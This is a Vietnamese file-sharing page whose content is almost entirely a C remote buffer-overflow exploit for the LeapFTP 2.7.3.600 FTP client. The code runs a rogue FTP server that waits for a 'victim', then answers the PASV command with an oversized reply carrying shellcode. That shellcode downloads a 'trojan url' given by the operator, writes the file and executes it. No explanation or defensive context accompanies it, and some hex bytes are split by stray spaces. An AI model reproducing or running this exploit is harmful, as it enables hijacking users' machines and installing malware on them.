Tràn bộ đệm ở LeapFTP

Chia sẻ: Ai Dieu | Ngày: | Loại File: DOC | Số trang:11

Thêm vào BST

Báo xấu

93
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tràn bộ đệm ở LeapFTP

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Tràn bộ đệm ở LeapFTP

Tràn bộ đệm ở LeapFTP, LeapFTP 2.7.3.600 trang này đã được đọc lần */ #include #include void main(int argc, char *argv[]){ printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n"); printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n"); printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n"); printf("; www.dwcgr0up.net ;\n"); printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n"); if(argc
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE B\x30\x5F\xFC\x8B\xF7\x80" "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8 B\xE6\x33\xD2\xB2\x04\xC1" "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x 2B\xE2\x54\x5A\xB2\x7C\x8B" "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\x E0\x08\x89\x45\xF8\x8B\x40" "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8 B\xF8\x8B\x7F\x0C\x03\x7D" "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF 8\xEB\xEB\x50\x8B\xF8\x33" "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x 57\x8B\xD7\x80\x7A\x03\x80" "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x 7E\x8B\x7D\xFC\x51\xF3\xA6" "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x 10\x03\x7D\xF8\xC1\xE0\x02" "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x 89\x45\xF4\x8B\x40\x3C\x03" "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x
45\xF4\x89\x45\xF0\xAD\x03" "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x 55\xEC\x8B\x75\xFC\x8D\x76" "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x 51\xF3\xA6\x59\x5E\x74\x06" "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x 33\xC9\x66\x8B\x0E\xEB\x02" "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x 89\x4D\xE4\x8B\x5D\xFC\x8D" "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x 55\xF4\x52\x8B\x45\xE4\xFC" "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x 03\x43\xEB\xF9\x43\xE2\xE1" "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\ x8D\x5B\x0C\xFC\x53\x51\x53" "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\ x38\x2B\x74\x03\x43\xEB\xF9" "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\x D2\x52\x8B\x45\xD4\xFF\xD0" "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x5 3\x8B\x45\xC0\xFF\xD0\x8D" "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x 52\x33\xD2\x52\x52\x8D\x7B" "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\x A0\x52\x33\xD2\xB6\x1F\xC1" "\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x 8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\ x52\x53\x8B\x45\xDC\xFF\xD0" "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x 45\xD8\xFF\xD0\x8B\x55\xA4" "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x 52\x53\x8B\x45\xCC\xFF\xD0" "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\ x47\x65\x74\x4D\x6F\x64\x75" "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6 E\x65\x6C\x33\x32\x2d\x64" "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x7 2\x65\x73\x73\x08\x4C\x6F" "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x6 3\x72\x65\x61\x74\x08\x5F" "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x4 1\x6C\x6C\x6F\x63\x08\x5F" "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x6 3\x08\x45\x78\x69\x74\x50" "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x7 4\x2d\x64\x6C\x6C\x08\x49" "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x4 9\x6E\x74\x65\x72\x6E\x65" "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x6 5\x72\x6E\x65\x74\x52\x65" "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x6 5\x74\x43\x6C\x6F\x73\x65" "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x6
3\x2d\x65\x78\x65\x08\x68" "\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93 \x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93 \x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93 \x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93 \x93\x93\x93\x93\x93\x93" "\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x25\x49\xE1" "\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\x D5\xFE\xFF\xFF\xFE\x83\x25" "\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90"
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x 03\x80\xAB\x31\xFF\xFF\xFF" "\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\x FF\x03\x80\xAB\x34\xFF\xFF" "\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\x FF\xFF\x03\x80\xAB\x37\xFF" "\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\x FF\xFF\xFF\x03\x80\xAB\x3A" "\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x 3C\xFF\xFF\xFF\x03\x80\xAB" "\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\x AB\x3F\xFF\xFF\xFF\x03\x80" "\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x 80\xAB\x42\xFF\xFF\xFF\x03" "\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x 03\x80\xAB\x45\xFF\xFF\xFF" "\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\x FF\x03\x80\xAB\x48\xFF\xFF" "\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\x FF\xFF\x03\x80\xAB\x4B\xFF" "\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\ xFF\xFF\xFF\x03\x80\xAB\x4E" "\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x 50\xFF\xFF\xFF\x03\x80\xAB" "\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\x AB\x53\xFF\xFF\xFF\x03\x80" "\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x
80\xAB\x56\xFF\xFF\xFF\x03" "\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x 03\x80\xAB\x59\xFF\xFF\xFF" "\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\x FF\x03\x80\xAB\x5C\xFF\xFF" "\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\x FF\xFF\x03\x80\xAB\x5F\xFF" "\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\x FF\xFF\xFF\x03\x80\xAB\x62" "\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x 64\xFF\xFF\xFF\x03\x80\xAB" "\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\x AB\x67\xFF\xFF\xFF\x03\x80" "\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x 80\xAB\x6A\xFF\xFF\xFF\x03" "\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\ x03\x80\xAB\x6D\xFF\xFF\xFF" "\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\x FF\x03\x80\xAB\x70\xFF\xFF" "\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\x FF\xFF\x03\x80\xAB\x73\xFF" "\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\x FF\xFF\xFF\x03\x80\xAB\x76" "\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x 78\xFF\xFF\xFF\x03\x80\xAB" "\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\x AB\x7B\xFF\xFF\xFF\x03\x80"
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\ x80\xAB\x7E\xFF\xFF\xFF\x03" "\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x 81\x03\x80\x6B\x82\x03\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\xE9\x61\xF9\xFF\xFF"; char *url = argv[2]; if(strlen(url)>80){ printf("ERROR: trojan url is too long!\n"); return; } for(unsigned int i = 5; i
SOCKADDR_IN addr_Sock; addr_Sock.sin_family = AF_INET; addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY); addr_Sock.sin_port = htons(atoi(argv[1])); printf("Awaiting for connections...\n"); if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return; if(listen(listen_Sock, 1))return; SOCKET victim = accept(listen_Sock,NULL,NULL); printf("Victim connected...\n"); char buffer[2048]; sprintf(buffer, "220 drG4njubas roxx da world...\r\n"); send(victim, buffer, strlen(buffer), NULL); while(true){ if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return; if(strncmp(buffer, "USER", 4)==0){ sprintf(buffer, "%s\r\n", "331 Password required for user."); send(victim, buffer, strlen(buffer), NULL); } else if(strncmp(buffer, "PASS", 4)==0){ sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL); } else if(strncmp(buffer, "SYST", 4)==0){ sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0"); send(victim, buffer, strlen(buffer), NULL); } else if(strncmp(buffer, "REST", 4)==0){ sprintf(buffer, "%s\r\n", "350 Restarting at blah."); send(victim, buffer, strlen(buffer), NULL); } else if(strncmp(buffer, "PWD", 3)==0){ sprintf(buffer, "%s\r\n", "257 Current directory was changed."); send(victim, buffer, strlen(buffer), NULL); } else if(strncmp(buffer, "TYPE", 4)==0){ sprintf(buffer, "%s\r\n", "200 Type set to blah."); send(victim, buffer, strlen(buffer), NULL); } else if(strncmp(buffer, "PASV", 4)==0){ printf("PASV command received, sending exploit..."); sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit); send(victim, buffer, strlen(buffer), NULL); printf("finnished.\n"); break; } else{
printf("ERROR: Wrong client or pasv mode is not enabled.\ n"); break; } } closesocket(victim); closesocket(listen_Sock); WSACleanup(); }